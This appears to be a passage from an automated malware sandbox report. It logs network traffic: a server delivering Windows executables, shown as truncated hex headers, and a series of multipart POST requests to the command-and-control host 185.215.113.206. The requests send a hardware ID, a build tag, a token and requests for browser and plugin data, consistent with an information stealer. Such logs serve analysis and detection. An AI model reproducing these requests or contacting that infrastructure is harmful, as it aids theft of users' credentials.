00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:55:55 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:00 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 26 Oct 2024 03:44:58 GMTConnection: keep-aliveETag: "671c65ba-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 24 1c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 20 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 69 00 00 04 00 00 fa 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 68 65 62 78 79 7a 72 00 a0 19 00 00 70 4f 00 00 9c 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 7a 61 79 65 78 74 71 00 10 00 00 00 10 69 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 69 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:02 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:09 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:12 GMTContent-Type: application/octet-streamContent-Length: 2831360Last-Modified: Sat, 26 Oct 2024 03:26:14 GMTConnection: keep-aliveETag: "671c6156-2b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 41 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 6c 6b 6e 67 6d 71 6b 00 e0 2a 00 00 a0 00 00 00 d4 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6a 6d 6e 62 74 70 6e 00 20 00 00 00 80 2b 00 00 04 00 00 00 0e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 12 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 47 49 44 41 45 48 43 46 49 44 47 43 42 47 49 49 2d 2d 0d 0a Data Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="build"puma------FCFBGIDAEHCFIDGCBGII--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="message"browsers------IEHIIIJDAAAAAAKECBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 46 43 41 45 42 46 49 4a 4a 4b 46 48 44 41 45 43 2d 2d 0d 0a Data Ascii: ------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="message"plugins------JJDBFCAEBFIJJKFHDAEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 2d 2d 0d 0a Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="message"fplugins------DGDAEHCBGIIJJJJKKKEH--
